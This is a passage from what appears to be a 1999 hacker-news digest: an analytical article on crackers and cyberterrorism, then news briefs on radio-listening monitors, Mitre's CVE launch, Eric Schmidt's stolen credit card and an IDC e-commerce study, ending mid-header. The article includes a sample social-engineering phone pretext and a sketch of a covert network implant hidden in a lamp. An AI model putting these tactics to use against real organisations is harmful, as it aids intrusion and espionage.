The minimum skill-set needed to be a 'script-kiddy' is simply the ability to read
English and follow directions. Indeed, much can be gleaned from books or
documents and mailing lists online such as 'L0pht' bulletins and 'Phrack', whilst
exploits can be learned from websites such as 'bugtraq', 'rootshell' or
'packetstorm'. In fact, virus-writing and exploit code is common, and some is
even automated.
However, to launch a sophisticated attack against a hardened
target requires three to four years of practice in C, C++, Perl and
Java (computer languages), general UNIX and NT systems
administration (types of computer platform), LAN/WAN
theory,remote access and common security protocols (network
skills) and a lot of free time. On top of these technical nuts and
bolts, there are certain skills that must be acquired within the cracker
community.
'Hi, I'm Cheryl, I'm new in IT support. I'm having trouble with the modem bank.
Can you check the modem to make sure it's turned on? Also, can I have the
number to make sure I'm using the right one?' Of course, being a diligent and
helpful worker, the recipient of such a call may be only too happy to help.
Tools of the trade
The cracker skillset is more common in highly educated individuals taught in the
USA and Western Europe, although anyone with enough intelligence and time
can pick it up without formal schooling. In fact, the skills are not at all rare or
unusual, being the same as those required for an average, small or
medium-sized company network system administrator: a position which
commands among the lowest pay in the computer industry. The chances are
that there is a university drop-out in your town with all of these prerequisites. That
said, a list of qualifications does not fully explain their make-up, as the skillset is
more to do with lifestyle than specific capabilities. Some people collect baseball
cards; others analyse [computer network] protocols.
Attacks happen in various guises, from the simple and automated to the highly
disguised and sophisticated. Crackers also write their own tools, which are
disseminated in the underground. Certain system diagnostic tools and other
cracker script tools can significantly automate the process of cracking less
secure systems. At the low end of the sophistication scale there are activism
websites, such as 'Floodnet', which hold web-page functionality that automates
the process of reloading another website's pages in an attempt to make the
system 'overheat' so that it ceases to work. This is a form of the most common
exploit, Denial of Service (DoS), which comes in many forms. It is most common
due to webmasters and web server administrators creating poorly written
Common Gateway Interface (CGI) scripts (website programming). Exploiting the
poorly written code is no great feat. In the words of one hacker: "Any punk kid
could do this to any organisation without any trouble whatsoever."
Computer specialists suggest that, while annoying, such unsophisticated DoS
attacks have a hidden danger: they could mask the use of specialist software
custom-written by an élite cracker amid the noise of the barrage of multiple
automated attacks. Other tools exist that are designed by the hacker
community, such as BO2000, which was specifically created to embarrass
Microsoft's Windows NT security. In fact, the size of the black market in software
(computer programmes) is enormous. Not only can exploit tools be procured in
this manner, but they can easily be found online.
Social engineering
Social engineering is a term describing the process whereby crackers engineer a
social situation that allows any potential cracker to obtain access to an
otherwise closed network. This access could either be permanent (infiltrating an
insider into the organisation who enables outside access), or temporary. Indeed,
the scenario has a stunning simplicity about it: "Hi, I'm Cheryl. I'm new in IT
support. I'm having trouble with the modem bank. Can you check the modem to
make sure it's turned on? Also, can I have the number to make sure I'm using the
right one?" Of course, being a diligent and helpful worker, the recipient of such a
call is only too happy to help.
Most previous instances of information technology (IT) security violations have
been attributable to 'inside jobs', which is why there has been significant
controversy recently about US concerns hiring foreign programmers to rectify
Y2K issues.
Having gained access, a cracker can either install code directly
into the systems on the spot or add a transmitter device. To
illustrate a scenario, after gaining access to a facility as cleaning
staff, the perpetrator could put a small computer, itself connected
to the main network, into the base of a lamp with an infra-red port
(network connection) aimed out the window of an office or linked to
a mobile phone. This gives an active presence on the target network and, more
importantly, remote access to the device from anywhere within line of sight. In
commercial environments, the security teams that search for bugs (bugs in the
classical sense - 'listening devices') with receivers do not generally do infra-red
profiles of a building; such a device will not transmit unless active, so sweeping
for it is more difficult than trying to detect a bug that is monitoring audio.
Cellular modems also work, but are potentially detectable by radio-frequency
sweeps. However, for corporate espionage it is an easy matter to pre-position
several such systems and then take advantage of security vulnerabilities to gain
permanent entry to the system. The phone company makes entry easy if the
location is near a residential area as a receiving mobile phone just needs to be
plugged into the network interface (telephone connection) of any house. Such
attacks are not new, but the scale of machines necessary to realise them is
down to 4in2 of PC board for an amateur willing to spend a little time shopping in
the back of a technology magazine. "For less than US$1,000 you could build
such systems and disguise them as appliances like lamps," said Paul Roberts,
a US-based information security (INFOSEC) specialist.
Espionage on other computers by remotely monitoring the electro-magnetic (EM)
signals they emit whilst in use is possible today, albeit expensive. Figures of
$35,000 are quoted as estimates for a remote monitoring station in a van, for
example, although the cost is coming down. "EM snooping technology might
very well come into the reach of the advanced information security hobbyist or
the determined criminal in the next five to 10 years," said Markus G Kuhn from
the Computer Laboratory at Cambridge University in the UK.
Cracking: methods
Exploits come mainly in three species: DoS; destruction of information (erasing);
and corruption of information (spoofing).
As indicated previously, DoS attacks take the form of overloading the processes
of the computer hosting the website (the server), which then shuts itself down.
Recently, a new form of such attacks has become prevalent - the 'distributed
co-ordinated attack' - in which thousands of servers are used in unison. "It's
possible to detect the attack, but it is very hard to block it using current
software," said Thomas Longstaff, senior technical researcher for the Software
Institute at Carnegie Mellon University. However, a co-ordinated attack to bring
down a government's or a corporation's computer systems cannot be maintained
long enough to be little more than a nuisance. Yet while only annoying at the
moment, as interconnectivity increases and the importance of the online
economy becomes manifest, such exploits will have serious financial
implications. That said, recovery from such an attack tends to be fast.
Erasing is considered very difficult to conduct because any system worth
attacking is also worth backing up. UK and US interbank transactions are
backed up daily with multiple remote tapes, so any cracker wanting to destroy
the interbank market will cause the loss of at most one day's transactions.
However, this is not without consequence: consumer confidence in the banking
system might drop to unprecedented levels were exploits to be publicised.
Viruses are a form of erasure most computer users are familiar with. Indeed, as a
teenager Robert Morris accidentally launched a virus that shut down most of the
Unix-based computers in the USA in the 1980s. Much can be said for judging the
security implications of information technology by the fact that virus protection is
now standard on any company computer. A good thing too, as 1999's 'Melissa
virus' was the first of a new generation of Microsoft-targeted viruses that are
self-replicating by sending themselves forward in an email entitled 'Important
message from . . .' to the people listed in a person's Outlook Express email
package without their knowledge. The 'Bubbleboy' virus promises to be worse, as
you just have to receive it to be affected. Erasing attacks can be guarded against
through multiple, remote (in both geography and network topology) back-ups,
taken at sufficient frequency that the maximum possible loss is bearable for the
system (the 'safe frequency'). Any system for which the safe frequency is too low
for the defence to be practical (such as a power grid) tends be kept remote from
networks, although this is not always the case.
Yet for every solution there is a problem. The effectiveness of back-ups can be
circumvented by malicious programming that corrupts one random byte in the
data; even though the back-ups look good, the data is bad. There is no way of
telling unless the whole tape is recovered to find the one or two data files that
have changed and examining them 'with a microscope'. The problems are obvious
if someone had 10 weeks of back-ups, each with different bits of bad data, and
all the back-ups were infected. There would be no way to know which data was
good and which was bad. Indeed, if the cracker knows enough about the system
he/she is attacking, recovery may be impossible.
Spoofing is much more difficult to guard against. This kind of attack comes in
two guises: attempts to create phoney records or phoney messages in a system
(such as creating false bank accounts); or attempts to create phoney
instructions to the processing system, causing a failure of the system. This is as
bad as an erasing attack. The easiest way to defend against non-destructive
spoofing is again to use back-ups and to operate double-entry book-keeping,
which traces every record to its creation and requires consistency between
numerous (again, preferably topologically remote) sources. This multiplies the
difficulty of an attack as the attacker has to break several systems instead of
just one. By appearing to be a user, however, a cracker could manipulate data or
corrupt the hardware by installing a virus, for example. While this would not be
quite like a bomb going off, it could have much worse long-term repercussions.
The Internet Auditing Project
Host count: 36,431,374
Vulnerability count: 730,213
Vulnerable host count: 450,000
Destructive spoofing aimed at the processor rather than its records is a different
matter. Causing the processor to execute phoney instructions could allow an
attacker to erase records, transmit phoney messages and, potentially, cover
his/her tracks well enough to escape consistency checks. This kind of attack is
more difficult than any other - usually the only way to get another machine to
execute rogue instructions is to exploit 'buffer overflows', overloading the
temporary data buffer on computers.
Nightmare scenarios are based on such attacks. "We could wake one morning
and find a city, or a sector of the country, or the whole country having an electric
power problem, a transportation problem or a telecommunication problem
because there was a surprise attack using information warfare,'' claims Richard
Clarke, the US National Security Council adviser who heads counterterrorism
efforts. Whilst alarmist, precedents do exist, as evidenced by Gail Thackaray,
recognised as one of the premier cracker-catchers in the business: "One hacker
shut down a Massachusetts airport, 911 emergency service and the air traffic
control system while playing with the municipal phone network, and another
hacker in Phoenix invaded the computer systems of one of the public energy
utilities, attaining 'root' level privileges on the system controlling the gates to all
the water canals from the Grand Canyon south." These examples involved
individuals rather than organised groups, and none of them were politically
motivated.
Cyberterrorism?
In warfare as well as in business, IT is the great equaliser. Its low financial barrier
to entry relative to heavy industry allows even the poorest organisations an IT
effectiveness equal (or nearly equal) to large corporations.
The greatest advantage the covert warfare arms of major
nation-states (such as the CIA or Mossad) have over small
terrorist organisations is the financial wherewithal to
develop massive intelligence networks using the best
equipment. IT levels the playing field in this regard.
Because sensitive military computers are required to be kept as far away from
the Internet as possible, unless there was some major oversight or an incidence
of social engineering, a military system cannot be directly attacked. However,
there is always a weak link in the chain: for example, an army depends on
Vendor A for supplies/ equipment, and Vendor A depends on parts from Vendor
B, and so on. Somewhere in that chain is a vulnerability due to the massive
networks, technological dependence and just-in-time ordering systems. Indeed,
although direct attacks on critical infrastructure are unlikely, if on a network that
has a link into it elsewhere, then one vulnerability is all it takes. Strikes in one
automotive plant have effectively shut down large car makers. Most US
automotive plants are also government contractors supplying vehicles and
replacement parts to the military: an obvious target for planting viruses during
war.
Some people collect baseball cards, others analyse protocols
Cyberterrorism is not only about damaging systems but also about intelligence
gathering. The intense focus on 'shut-down-the-power-grid' scenarios and tight
analogies with physically violent techniques ignore other more potentially
effective uses of IT in terrorist warfare: intelligence-gathering, counter-intelligence
and disinformation.
Disinformation is easily spread; rumours get picked up by the media, aided by
the occasional anonymous e-mail. Cracking into a government server and posting
a new web page looks impressive and generates publicity, but cracking into a
government server and reading private email is much more valuable to terrorists.
This gives cyberterrorists valuable details about the thought and operations of
their adversaries, and can aid in planning conventional attacks. Furthermore, if
terrorists can penetrate the security of an enemy organisation's computer
networks, they do not need to do any damage to be militarily effective. Rather,
they can quietly copy information to process at their leisure, without having to
physically smuggle it out of secure facilities. False or misleading information can
be planted in (or deleted from) databases, undermining the effectiveness of
organisations relying on that information. In today's environment, authentication
via strong encryption is still rare and IT makes forgery easy. Credentials can be
forged to fool authorities or the media for purposes of disinformation or to
enhance covert physical activities.
As pointed out by Clifford Stoll in The Cuckoo's Egg, automated 'data mining'
techniques can be used to search for useful patterns in vast stores of insecure
and seemingly unrelated data. A bank may assume its electronic fund transfer
system is the most vital system to protect, but a terrorist may only want access
to the financial records of persons or groups that are the bank's customers. This
may not even involve destruction of data, as the pure information is often much
more valuable than simply destroying random records. Reconnaissance attacks
such as these are difficult to stop but extremely damaging. In the long-term
banking scenario, the terrorist may simply choose to track sources of funding
based on deposit records to harm the person or group who is the target. In a
situation like this, going into the bank to destroy the information is only a
temporary setback and will raise attention. Why destroy a valuable point of
information gathering by doing something short-term like disrupting operations?
Nevertheless, for the terrorist, cracking might be used for
more than just destroying data. Attacking an information
system would be a good way to either distract the target
or otherwise enable the terrorist to perform a physical
attack. An example might be to crack into an airline and
delete transport manifests to cover the transport of illegal
materials. Had Shoko Asahara and the Aum Shinrikyo group been able to crack
the Tokyo power system and stop the subways, trapping passengers on the
trains, the number of casualties caused by their 1995 Sarin gas attack might
have been significantly larger. If a determined group wanted to bring New York to
its knees, what better way than to combine a physical bombing campaign with
simultaneous IT attacks on the power grid, hospitals, emergency services and
the media?
Turning to the larger picture, in warfare the party that runs out of funds first loses.
Thus, the objective of warfare may not just be to inflict as much
physical damage as possible, but instead be to maximise
financial damage. The Irish Republican Army (IRA) learnt
to use this concept very effectively in recent years,
sufficiently occupying the resources of the British
government through infrastructural attacks (as opposed to
direct attacks against people). This suggests that, in the future, stock markets or
other primary financial institutions might become high-profile targets and the
most effective means of accomplishing a terrorist's goal. More damage would be
accomplished by taking the New York Stock Exchange offline for a few days
rather than actually bombing a building. That said, financial institutions are one of
the few parties recognised in the hacker community for taking their security very
seriously indeed.
Given the predominance of the IT-based industry and the familiarity of the Internet
in the USA and Western Europe, the terrorist groups that fit the motive and
mindset to use cracking could be closed religious or fanatical groups whose
value systems are so out of sync with the mainstream that they feel threatened
enough to take as much of the world with them as they 'go under'. That, together
with 'lone gunmen' and activism campaigns - 'hacktavism' - are scenarios that
appear to fit the profile.
A Pakistani Internet hacker known only as 'Dr Nuker', for example, has a
message for Americans: he and a cybercohort, one 'Mr Sweet', have not yet
begun to fight. The idea of Third World cyberpunks threatening the planet's sole
superpower might seem unlikely - unless, of course, you run Internet sites at
Lackland AFB or 86 other facilities their group that the 'Pakistan Hackerz Club'
(PHC), has struck in the past five months.
The PHC's self-described founder and perhaps the world's most prolific Web
cracker today, Dr Nuker admits he's a revolutionary, a 'cyberterrorist' with a
cause: freedom for Indian-controlled Kashmir. Yet by penning anti-Indian
missives on Internet sites run by the Naval Reserve Maintenance Facility in
Ingleside, the Karachi Stock Exchange and even the Disney Guide, Dr Nuker not
only has become a high-profile 'hacktivist' - a computer cracker with a political or
social goal - but a wild card who hints he can wreak havoc far from home.
"We don't have any intentions to compromise any sort of military or governmental
database, but in case there will be a cyber war with Pakistan, then we will sure
prove our knowledge, ability and skills," he warned in an e-mail message. It may
be no idle boast.
Today, employers, even those running critical infrastructure, are hard-pressed to
not give employees Internet access; 401k retirement plans, health insurance
plans and others are starting to mandate it. Most employees are on insecure,
poorly administered, unreliable desktop operating systems: the recipe for serious
electronic mayhem.
Beyond the hype
Critics maintain there is no such thing as cyberterrorism, and there is
undoubtedly a lot of exaggeration in this field. If your system goes down, it is
much more interesting to say it was the work of a foreign government rather than
admit it was due to an American teenage 'script-kiddy' tinkering with a badly
written CGI script. If the power goes out, people light a candle and wait for it to
return, but do not feel terrified. If their mobile phones switch off, society does not
instantly feel under attack. If someone cracks a web site and changes the
content, terror does not stalk the streets. Some groups talk of taking down power
grids; while that would help in conjunction with another type of attack, in itself it
would be useless. Most grids suffer infrequent black-outs anyway that are not
terrorist-related. In fact, terrorism campaigns using just computers are unlikely.
The sheer size of programmes works against the attacker more than the
defender. No one person can fully understand a programme comprising over a
million lines of code, especially if he/she did not write it, and the defender has
more people available. Critical programmes that run infrastructure functions, such
as traffic lights, are usually custom-written, making them twice as difficult to
attack.
Any system put together in the last few years will have been implemented with
security in mind. Ironically, Y2K could prove to be a boon, as audits will give
detailed reports on exactly what is in a system and this information can be used
to boost security.
Most security-aware organisations do not put highly sensitive (such as military or
corporate) data on servers that are accessible via the Internet and design their
Internet servers to be disposable and easily reinstalled from compact disc (CD)
or tape. These organisations also typically keep their servers in restricted-access
areas. Most organisations with sensitive data also keep off-site back-ups.
Write-once CDs are becoming very popular as they are inexpensive, compact
and convenient to restore from. To cause serious and lasting damage, a terrorist
would need to destroy or corrupt not only the contents of the servers, but also
the off-site back-ups.
Reality bytes
In theory, cyberterrorism is very plausible, yet in reality it is difficult to conduct
anything beyond simple 'script-kiddy' DoS attacks. Terrorists attempting to sway
a populace by fear would therefore be less interested in such an attack unless
they could carry out an extremely damaging one on a repeatable basis or unless
they used it to augment the effects of a physical attack.
As things stand, while a terror attack using crackers is potentially highly
destructive, the psychological impact of the disruption of services is still much
lower than that of a direct physical attack.
Johan J Ingles-le Nobel is Deputy Editor of JIR, having previously obtained his
Masters at St Andrews University. He gratefully thanks the contribution and
advice of people at Slashdot.org.
@HWA
17.0 Car Radio Listening Habits Being Gathered
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
Think your safe from the prying eyes of the data
collector when you're peacefully driving your car and
listening to the radio? Think again. New technology
being tested in Atlanta, Toronto, Los Angeles and
Phoenix can remotely determine what radio station you
are listening to in your car. Small shoebox-size
electronic sensors posted on billboards and light poles
can listen to the signal from the oscillator in the car
radio, determine the frequency and log the information
in a central database. This information is then made
available to subscribing radio stations in real time to
help in determining ratings numbers. (Even though this
system does not collect demographic data, can't
collect AM yet, and doesn't listen to homes or
businesses, it is still scary as hell.)
The Atlanta Journal Constitution
http://www.accessatlanta.com/partners/ajc/newsatlanta/radio/index.html
Getting with the program
WCNN to debut as issue-oriented
talk radio geared to Atlanta's
black audience
We've got rock, rap,
country, salsa and
smooth jazz. But come
April 3, Atlanta will have
a new radio format -
black news/talk.
That's when Midwestern
Broadcasting, owner of
adult R&B station Kiss
104.7, will take over
programming of
WCNN/680 AM from Cox Radio and
launch a 24-hour news/talk station aimed at
Atlanta's African-American community.
According to Midwestern Vice President
David Dickey, the station will emphasize
local programs rather than syndicated
shows, and focus on issues such as
education, government, health care and the
economy.
In the next few weeks, the company will
announce the station's new name, unveil a
logo and begin hiring on-air talent.
The takeover will end WCNN's lineup of
news/talk shows, including Tom Hughes in
the morning, the syndicated G. Gordon
Liddy show at midday and Neal Boortz
producer Royal Marshall's talk show in the
afternoon.
"I don't think Neal [Boortz] or Dr. Laura
[Schlessinger] are focused on the needs
and issues of the average
African-American listener," Dickey said,
referring to popular programs on news/talk
stations WSB-AM and WGST-AM/FM.
"If we are here to serve the black
community, programming has to originate
from that community. If you had to pick any
city in America to support this effort, Atlanta
is the city to do it."
According to Arbitron, the company that
provides radio ratings, 769,000 of Atlanta's
3 million radio listeners ages 12 and older
are black.
As news of the venture trickled into the
radio community Tuesday, many industry
observers seemed to believe that a black
news/talk station would be a savvy addition
to Atlanta's increasingly competitive and
lucrative radio market.
At 50,000 watts in the daytime and 10,000
watts at night, WCNN is the
second-strongest AM signal in town,
behind WSB.
"Oooh, that's smart," said Star 94 general
manager Mark Kanov upon hearing the
news. "A market like Atlanta would certainly
have a strong core for a station like that. On
the surface, it seems like it would have a
very strong appeal."
"It's what I would do if I owned the station,"
said Andrew Saltzman, general manager of
Sportstalk 790/The Zone. "Talk radio is a
booming format, and that's a
[demographic] that's not truly being catered
to. Why shouldn't the urban community have
full-service talk radio?"
Black news/talk is not a new idea. The
format has been successfully adopted by
WOL in Washington and WLIB in New
York. But because there was usually only
one per community, urban radio stations
have not broken into niche formats as
quickly as stations geared to white
audiences.
For example, V-103, Atlanta's top-rated
urban station, was the only major FM
station catering to the African-American
audience until 1992, when Kiss 104.7
signed on the air. V-103 morning host
Frank Ski explained how such exclusivity
affected the listening habits and
expectations of the black radio audience.
"For a long time, the lack of radio stations
available to minorities meant we didn't
have a second or third choice when it came
to radio," Ski said. "That made the black
community begin to like a whole package
of things [on one station].
We want to hear music, hear something
funny and be informed. Black talk can be
good for the market if it's done right. The
difficulty is that because we haven't really
had it, there's not a lot of good, available
talent to do it. They will be competing with
the white news-talk stations, so they really
need to have their game together."
Midwestern Broadcasting, which is owned
by the Dickey family, has specialized in
creating formats for the African-American
community, such as the adult R&B of Kiss
104.7 and the contemporary gospel of
Glory 1340 AM. However, some have
raised questions as to whether white
management is politically or socially
motivated.
Ryan Cameron, morning man at rap station
Hot 97.5, wonders whether Midwestern will
take the new station into the community as
much as he or Ski do with their shows.
"Anything that's going to make the market
more interesting is definitely a plus,"
Cameron said. "It's great to raise issues
and talk, but how visible will they be?
It's not like they got new owners. I'll be
curious to see how much involvement there
will be in the community other than
monetary."
Dickey doesn't believe that a black
news/talk station with white ownership will
cripple its chances of success.
"Race has nothing to do with it, it just
makes good economic sense," he said.
"Sure, we're trying to make a buck off this.
But more important, we've been able to
provide a choice for African American
listeners in Atlanta.
As a broadcaster, it's my responsibility to
research the market and find the
opportunties that are there. We have two
well established radio stations in Kiss and
Glory, and this is an extension of that niche.
I don't care if you're white, black, Chinese,
male, famale, young or old, it doesn't make
sense to go up against established
stations like WSB or WGST. [A black
news/talk station] complements our
package.
We can cross-promote each station with
the other two. We can utilitze people who
appear on one and put them on the other."
The transaction does not involve the sale of
680 AM, rather a switch in who is calling
the shots about what is on the air. For five
years, Midwestern Broadcasting, which
owns the frequency, has leased 680 AM to
Cox Radio, owner of news/talk giant
WSB-AM (750).
Cox Radio has spearheaded
programming, first as a sports-talk station
(680/The Fan), then turning WCNN into a
news/talk station in 1997. The lease
between the two companies expires April
2.
According to Marc Morgan, co-chief
operating officer of Cox Radio, the
decision to end the arrangement was
mutual.
"When we made this [leasing] deal five
years ago, it made great sense at the time
and served the purpose it was meant to
serve," he said. "There's definitely a hole in
the market for a black talk station, and I
think it's a good idea. ... I haven't heard it
yet, so I couldn't even begin to speculate on
what effect, if any, it would have on any
other station in town."
@HWA
18.0 CVE by Mitre Goes Online
~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
The Common Vulnerabilities and Exposures database run
by Massachusetts defense contractor Mitre has gone
online. The database hopes to help standardize
computer security terms and set a common vocabulary
for building more secure systems. The database hopes
to contain all known system vulnerabilities. (It is unlikely
that any of the big 5 security companies will give up
new vulnerabilities that only they know about for their
competitors to find in this database. The database is
already missing some key advisories that have been
publicly released.)
The Boston Globe
http://www.globe.com/dailyglobe2/335/business/Handle_on_hackers%2b.shtml
Common Vulnerabilities and Exposures Database
http://www.cve.mitre.org/
Handle on hackers
Bedford firm seeks security standard with
software-weakness list
By Ross Kerber, Globe Staff, 12/01/99
BEDFORD - Before the invention of the periodic table in 1869, chemists
struggled to put elements such as hydrogen and lithium into a coherent
classification scheme.
Today, parts of the field of computer science now seem stuck with the same
lack of organization. In particular there is little agreement among software
security specialists on just how to classify the sections of computer code that
are often targeted by hackers.
Government and academic groups have attempted to categorize these
software Achilles' heels for years, to little commercial enthusiasm.
But now some steam is gathering behind a project run by Bedford-based
Mitre Corp. to create a simpler listing of weaknesses. The project doesn't try
to classify codes and other security problems into families or types, but only
to list them as part of what Mitre calls a directory of ''Common Vulnerabilities
and Exposures.''
By dumbing down its directory, known as the CVE, Mitre has persuaded 23
organizations including Cisco Systems Inc. and IBM Corp. to participate. The
result can be found on line at www.cve.mitre.org, and executives hope it will
help standardize terms and set a common vocabulary for building more secure
systems.
''The beauty of the approach we've taken is to avoid everybody arguing''
about complicated categorizations, said Steven Christey, a software engineer
at Mitre, a nonprofit government contractor.
His colleague, David Mann, compares the CVE to the lists of individual
elements that were drawn up long before the periodic table was accepted.
''To get things going scientifically we really need to start small,'' Mann said.
''Hopefully it will spawn more categorizations, eventually.''
While software viruses are quickly studied and named, the security
weaknesses they attack vary widely and are far more difficult to classify.
Consider the various names given for a type of code used by many Web sites
known as the ''common gateway interface,'' or cgi, generally used to connect
the site to on-line sources such as telephone directories.
Altering such code can cause big disruptions to the sites, a weakness known
as ''CA-96.06.cgi-example
code'' by CERT, a well-known computer-security center at Carnegie Mellon
University. Meanwhile CyberSafe Corp., an Internet security firm based in
Issaquah, Wash., discusses the same weakness as an ''HTTP `phf' Attack.''
While both continue to use those names, they also have begun to include in
their advisories the name chosen by Mitre for the condition:
''CVE-1999-0067,'' meaning that the problem was the 67th identified under
the CVE effort this year.
Eventually they might drop their own terminologies altogether, said Bill Fithen,
a CERT security analyst. ''If CVE catches on, there might truly be no
legitimate reason to continue'' using older names, he said.
For Mitre, CVE represents a chance to show off the commercial benefits of
its work for government agencies. Founded in 1958 by a group of
researchers formerly associated with MIT's Lincoln Laboratories, Mitre has
chiefly been known as a contractor on aerospace and classified military
projects, with offices from Fort Leavenworth, Kan., and Washington, D.C.,
to Seoul.
The company also has branched out into the civilian sector and now runs
research centers for the Federal Aviation Administration and the Internal
Revenue Service. In 1996 Mitre spun off divisions that did research in space,
environment, and telecommunications. It still has about 4,000 employees
worldwide and reported revenue of $542 million for its latest fiscal year.
At the behest of the Pentagon, Mitre several years ago began research in
areas of ''critical infrastructure protection''; 15 of the company's employees
now are involved in a FBI anti-hacking center in Washington, D.C.
The CVE is rooted in such work, dreamed up by Mann after he was assigned
last year to create a database to protect the company's computers.
Mann wanted to automatically compare alerts issued by CERT and other
security groups with an analysis of traffic on Mitre's computers, but Mitre's
programmers were using different terms. ''I realized we needed a way to put
these things together,'' said Mann, 37, who holds a doctorate in mathematics
and once taught at a US Navy postgraduate program in California.
Mann developed the idea with Christey, 32, a senior software engineer, and
last January they presented a paper at a conference at Purdue University in
Indiana, sparking broader commercial interest.
Now many attendees of that conference are members of CVE's 25-member
editorial board made up of software vendors, analysts, and academics, and
headed by Christey. So far the group has agreed to assign numbers to about
320 vulnerabilities, and hopes to get to 665 by the end of the year.
Like many business consortiums, the CVE board also includes members who
aren't so enthusiastic. Some worry their competitors will learn their secrets.
''CVE will only contain vulnerabilities that are old or not interesting,'' said
Marcus Ranum, chief executive of closely held Network Flight Recorder in
Woodbine, Md. To monitor possible breakthroughs Ranum has assigned an
employee to join the CVE board, which holds conference calls periodically to
discuss new entries. But the board member won't give away too much,
Ranum says.
''It puts me in a delicate spot as a vendor,'' he said. ''If I were going to make
CVE useful I'd give all my information to CVE. But then my competitors
would have it and my shareholders would kill me.''
But other CVE participants say they hope the list will demystify their work to
corporate customers and boost sa
les.
''Generally people can get pretty confused when you try to sell them
software,'' said Andre Frech, a researcher at Internet Security Systems in
Atlanta, which recently began including CVE numbers in a detection
database.
Internet Security Systems' founder, Christopher Klaus, says the CVE might
someday even become the basis of ''hacker insurance'' policies for companies
to minimize the impact of technical disruptions. Without CVE or something
like it, he said, ''it would be hard even to set the premiums ... because people
couldn't be specific enough about what they might be selling.''
If CVE catches on, it will please specialists who have tried to develop more
complex classification schemes with little notice, like Eugene Spafford, a
computer scientist at Purdue who ran the conference where Mann and
Christey first presented their paper.
Four years ago Spafford began building his own open database of computer
security flaws, but found few companies could agree on organizing criteria. In
contrast, he said, CVE has already achieved ''a lot more buy-in than has
happened in the past.''
This story ran on page C01 of the Boston Globe on 12/01/99.
© Copyright 1999 Globe Newspaper Company.
@HWA
19.0 Novell Head Victim of Online Credit Card Theft
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Novell chief Eric Schmidt has admitted that he has been
the victim of credit card theft. Speaking at San
Francisco's Digital Economy conference he blamed the
theft of his personal information on browser cookies. He
labeled cookies as "the biggest disaster for computers in
the past [few] years."
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2403346,00.html?chkpt=zdnntop
Novell chief's credit card stolen online
Eric Schmidt blames cookies for cyber theft --
calls cookies 'one of the biggest disasters for
computers.'
By Ben Elgin, Sm@rt Reseller
UPDATED December 2, 1999 3:26 PM PT
Novell chief Eric Schmidt knows firsthand the
problem of Internet fraud.
Speaking at San Francisco's Digital Economy conference
Thursday, Schmidt informed the crowd that his credit card
number had been stolen over the Internet in the past.
Although he isn't sure exactly how his card number was
lifted, Schmidt says he believes it was through a
mechanism that reads the cookies-files sitting on a user's
desktop and storing personal information, such as
passwords and preferences.
"Cookies are one of the biggest disasters for computers in the
past [several] years," says Schmidt, citing the lack of
security and the blatant breach of consumer privacy.
As Novell's chairman and CEO,
Schmidt is trying to oust cookies with his company's new
"digitalme" online identification-management service.
Based on Novell Directory Services technology, digitalme
is aiming to store and consolidate a user's multiple
passwords, address books, favorites lists and purchasing
preferences.
"Cookies are a great idea, [but] they are just stored in the
wrong place," says Schmidt.
Schmidt's brush with cyber thieves may have left him
wary, but not a whole lot poorer. "My liability was $50 ...
[but] I'm not sure what the credit card company's liability
was." he says
@HWA
20.0 IDC Says E-Commerce Unsafe Most of the Time
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Deepquest
The most recent Technology Integration Panel Study,
conducted by International Data Corporation paints a
grim picture of online security. Consumers have worried
about the security of their online transactions, and this
study seems to justify those fears. The study, entitled
E-Commerce Solutions: Customer Directions and
Segmentation by Company Size and Industry" explores
various market segments currently using e-commerce
systems and what the potential is for the future.
(Unfortunately the data for this study is already six
months old and had an extremely small sample size.
Hopefully a more comprehensive study can be
conducted soon.)
South China Morning Post
http://www.technologypost.com/enterprise/DAILY/19991202103702261.asp?Section=Main
Published on Thursday, December 2, 1999
ENTERPRISE
Online transactions are
not all secure, says study
NEWSBYTES
Consumers have worried about the security of their
online transactions, and a new study by International
Data Corporation (IDC) justifies their fears.
According to IDC's most recent Technology Integration
Panel Study, one in five large companies (those having
1,000 or more employees) is likely not to have a secure
transaction option available. In small companies, (10-99
employees) the ratio of firms not having a secure
transaction option rises to one in three.
"Information technology is again changing the business
landscape, offering the potential for better products and
services delivered to corporations, governments, and
consumers alike through the engineering of e-solutions,"
said Carey Azzara, program director of IDC's
"Corporate Computing: Vertical Views" research.
"However, realising this potential is not easy and
certainly not without pitfalls for the vendors trying to
bring the world into this new paradigm."
Mr Azzara emphasised the point that unless companies
have a secure means of accepting payment for a
transaction, whether that transaction is e-retail or
business-to-business, they are not engaging in
e-commerce; rather, they are engaging in e-business,
which is not the same.
"I will pick a secure server all the time," Mr Azzara said
when discussing how payment is be made online. Under
no circumstances, he cautioned, should credit card
numbers be given in a non-secure environment.
In fact he would not accept a secure-transaction logo on
a Web site, but would make sure that the online
merchant's server was really secure with encryption and
authentication capabilities.
Over 40 per cent of the survey's respondents reported
that they paid a premium for better e-commerce system
performance. The study found Microsoft had the largest
hold on the market, but Netscape, IBM, and Oracle
were seriously considered by 25 per cent of the
responding companies.
The full study, entitled "E-Commerce Solutions:
Customer Directions and Segmentation by Company
Size and Industry", explores the market segments
currently using e-commerce systems and how the
potential for future business is shaping up.
The study, conducted during July 1999, sampled 974
US and Canadian companies, stratified by size and
industry, and was weighted to reflect information and
communication technology of each marketplace.
Mr Azzara said consumers should "go ahead, make the
phone call" when passing over credit card information
unless the security of the site was established.
The message of the survey, he said, is: "Buyer beware!
Don't be a victim."
Additional information about IDC is available at
www.idc.com.
Copyright (c) Post-Newsweek Business Information, Inc.
All rights reserved.
@HWA
21.0 Attack Trees Help to Model Security Threats
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
With new security weakness showing up on a daily basis
how do you model threats against computer systems?
Bruce Schneier has come up with a formal methodology
for analyzing the security of systems and subsystems,
known as 'Attack Trees'.
Dr. Dobb's Journal
http://www.ddj.com/articles/1999/9912/9912a/9912a.htm
Attack Trees
Dr. Dobb's Journal December 1999
Modeling security threats
By Bruce Schneier
Bruce is the CTO of Counterpane Internet Security, author of Applied
